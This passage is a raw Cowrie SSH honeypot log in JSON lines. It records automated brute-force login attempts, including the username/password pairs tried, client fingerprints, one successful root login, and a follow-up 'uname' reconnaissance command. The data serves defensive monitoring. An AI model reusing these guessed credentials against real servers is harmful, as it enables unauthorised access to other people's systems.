{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:43:22.291147Z","src_ip":"199.195.248.191","session":"983ab0f1b84e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:43:22.375518Z","src_ip":"217.154.1.158","session":"a6c207d8c54c"}
{"eventid":"cowrie.login.failed","username":"panchali","password":"panchali123","message":"login attempt [panchali/panchali123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:43:22.786105Z","src_ip":"199.195.248.191","session":"983ab0f1b84e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:43:23.907308Z","src_ip":"199.195.248.191","session":"983ab0f1b84e"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":57130,"dst_ip":"1.2.3.4","dst_port":22,"session":"c71f0eb06101","protocol":"ssh","message":"New connection: 217.154.1.158:57130 (1.2.3.4:22) [session: c71f0eb06101]","sensor":"my-vps","timestamp":"2025-08-26T19:43:38.683968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:43:38.685480Z","src_ip":"217.154.1.158","session":"c71f0eb06101"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:43:38.699201Z","src_ip":"217.154.1.158","session":"c71f0eb06101"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:43:38.741493Z","src_ip":"217.154.1.158","session":"c71f0eb06101"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:43:39.757887Z","src_ip":"217.154.1.158","session":"c71f0eb06101"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":50744,"dst_ip":"1.2.3.4","dst_port":22,"session":"15579b121d2c","protocol":"ssh","message":"New connection: 217.154.1.158:50744 (1.2.3.4:22) [session: 15579b121d2c]","sensor":"my-vps","timestamp":"2025-08-26T19:43:56.074986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:43:56.075945Z","src_ip":"217.154.1.158","session":"15579b121d2c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:43:56.090122Z","src_ip":"217.154.1.158","session":"15579b121d2c"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:43:56.133269Z","src_ip":"217.154.1.158","session":"15579b121d2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:43:56.240976Z","src_ip":"217.154.1.158","session":"15579b121d2c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:43:56.241775Z","src_ip":"217.154.1.158","session":"15579b121d2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:43:56.257553Z","src_ip":"217.154.1.158","session":"15579b121d2c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:43:56.258769Z","src_ip":"217.154.1.158","session":"15579b121d2c"}
{"eventid":"cowrie.session.connect","src_ip":"93.108.120.147","src_port":44170,"dst_ip":"1.2.3.4","dst_port":22,"session":"2135d1d8f435","protocol":"ssh","message":"New connection: 93.108.120.147:44170 (1.2.3.4:22) [session: 2135d1d8f435]","sensor":"my-vps","timestamp":"2025-08-26T19:43:57.276958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:43:57.278022Z","src_ip":"93.108.120.147","session":"2135d1d8f435"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:43:58.972284Z","src_ip":"93.108.120.147","session":"2135d1d8f435"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33060,"dst_ip":"1.2.3.4","dst_port":22,"session":"3198fc8cd172","protocol":"ssh","message":"New connection: 217.154.1.158:33060 (1.2.3.4:22) [session: 3198fc8cd172]","sensor":"my-vps","timestamp":"2025-08-26T19:44:13.587506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:44:13.588410Z","src_ip":"217.154.1.158","session":"3198fc8cd172"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:44:13.602645Z","src_ip":"217.154.1.158","session":"3198fc8cd172"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:44:13.647694Z","src_ip":"217.154.1.158","session":"3198fc8cd172"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:44:14.664616Z","src_ip":"217.154.1.158","session":"3198fc8cd172"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":37822,"dst_ip":"1.2.3.4","dst_port":22,"session":"e35e8091c51d","protocol":"ssh","message":"New connection: 199.195.248.191:37822 (1.2.3.4:22) [session: e35e8091c51d]","sensor":"my-vps","timestamp":"2025-08-26T19:44:25.822522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:44:25.827641Z","src_ip":"199.195.248.191","session":"e35e8091c51d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:44:25.923626Z","src_ip":"199.195.248.191","session":"e35e8091c51d"}
{"eventid":"cowrie.login.failed","username":"asteriskftp","password":"123456","message":"login attempt [asteriskftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:44:26.288476Z","src_ip":"199.195.248.191","session":"e35e8091c51d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:44:27.379775Z","src_ip":"199.195.248.191","session":"e35e8091c51d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43666,"dst_ip":"1.2.3.4","dst_port":22,"session":"c52ea86c1633","protocol":"ssh","message":"New connection: 217.154.1.158:43666 (1.2.3.4:22) [session: c52ea86c1633]","sensor":"my-vps","timestamp":"2025-08-26T19:44:30.971312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:44:30.972466Z","src_ip":"217.154.1.158","session":"c52ea86c1633"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:44:30.986981Z","src_ip":"217.154.1.158","session":"c52ea86c1633"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-26T19:44:31.032022Z","src_ip":"217.154.1.158","session":"c52ea86c1633"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:44:32.048919Z","src_ip":"217.154.1.158","session":"c52ea86c1633"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51166,"dst_ip":"1.2.3.4","dst_port":22,"session":"5706d8549c4c","protocol":"ssh","message":"New connection: 217.154.1.158:51166 (1.2.3.4:22) [session: 5706d8549c4c]","sensor":"my-vps","timestamp":"2025-08-26T19:44:48.563286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:44:48.564106Z","src_ip":"217.154.1.158","session":"5706d8549c4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:44:48.578896Z","src_ip":"217.154.1.158","session":"5706d8549c4c"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-26T19:44:48.624871Z","src_ip":"217.154.1.158","session":"5706d8549c4c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:44:49.640779Z","src_ip":"217.154.1.158","session":"5706d8549c4c"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":48810,"dst_ip":"1.2.3.4","dst_port":22,"session":"edaa24fb1d8b","protocol":"ssh","message":"New connection: 217.154.1.158:48810 (1.2.3.4:22) [session: edaa24fb1d8b]","sensor":"my-vps","timestamp":"2025-08-26T19:45:06.183726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:45:06.184473Z","src_ip":"217.154.1.158","session":"edaa24fb1d8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:45:06.199147Z","src_ip":"217.154.1.158","session":"edaa24fb1d8b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:06.242061Z","src_ip":"217.154.1.158","session":"edaa24fb1d8b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:45:07.258275Z","src_ip":"217.154.1.158","session":"edaa24fb1d8b"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":36330,"dst_ip":"1.2.3.4","dst_port":22,"session":"0eb43730f917","protocol":"ssh","message":"New connection: 217.154.1.158:36330 (1.2.3.4:22) [session: 0eb43730f917]","sensor":"my-vps","timestamp":"2025-08-26T19:45:23.502906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:45:23.503882Z","src_ip":"217.154.1.158","session":"0eb43730f917"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:45:23.519023Z","src_ip":"217.154.1.158","session":"0eb43730f917"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:23.564131Z","src_ip":"217.154.1.158","session":"0eb43730f917"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:45:24.580960Z","src_ip":"217.154.1.158","session":"0eb43730f917"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":36402,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb6676e2c452","protocol":"ssh","message":"New connection: 199.195.248.191:36402 (1.2.3.4:22) [session: eb6676e2c452]","sensor":"my-vps","timestamp":"2025-08-26T19:45:28.295449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:45:28.301887Z","src_ip":"199.195.248.191","session":"eb6676e2c452"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@